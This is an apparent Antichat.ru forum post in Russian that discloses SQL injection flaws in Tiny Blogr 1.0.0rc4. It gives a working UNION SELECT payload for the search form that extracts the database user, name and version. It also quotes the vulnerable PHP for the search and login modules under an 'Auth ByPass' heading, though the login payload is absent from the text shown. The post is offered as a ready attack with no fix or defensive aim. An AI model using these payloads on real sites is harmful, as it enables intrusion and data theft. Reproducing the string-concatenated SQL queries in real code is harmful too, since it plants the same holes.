Tiny Blogr 1.0.0rc4
Tiny Blogr 1.0.0rc4
SQL Иньекция:
Нужно:
magic_quotes = off.
/search
В поиск вбить ($_POST['txtKeyword'])
Цитата:
1%' union select 1,2,concat_ws(0x3a,user(),database(),version()),4, 5,6,7,8 --
|
Уязвимость находиться в файле / modules/search/index.php
PHP код:
foreach ($_POST['txtAv'] as $sitem) {
switch ($sitem) {
case "blogitem":
$obblog=new Blog();
$obblogitem=new BlogItem();
$obblogitemarr=$obblogitem->Find("bitTitle LIKE '%".$_POST['txtKeyword']."%' OR bitBody LIKE '%".$_POST['txtKeyword']."%' ORDER BY bitId DESC");
foreach ($obblogitemarr as $bbitem) {
$obblog->Load("blgId='".$bbitem->blgid."' ");
$title=$bbitem->bittitle;
$link=$cfg_url."/blog/".$obblog->blgshortcut."/view/".$bbitem->bitid;
array_push($result,array("title"=>$title,"link"=>$link));
}
break;
Auth ByPass
/login
Нужно:
magic_quotes = off
В поле username ($_POST['txtUsername']):
В password : blablabla
Уязвимость находиться в файле /modules/login/index.php
PHP код:
if ($_POST['ac']=="login") {
if ($_SESSION['captcha']==$_POST['txtVerify']) {
// authentication
if ($obeport->getAuthenticaion($_POST['txtUsername'],$_POST['txtPassword'])) {
$obeport->showMessage(2,_PORT_LOGEDIN);
$obeport->goPageDelay("blog/".$_POST['txtUsername'],3);
} else {
$obeport->showMessage(1,_PORT_CANNOT_LOGIN);
$obeport->goPageDelay("login",3);
}
} else {
$obeport->showMessage(1,_PORT_CAPTCHA_ERROR);
$obeport->goPageDelay("login",3);
}
} else {
(c) Ctacok, special for Antichat.ru
|
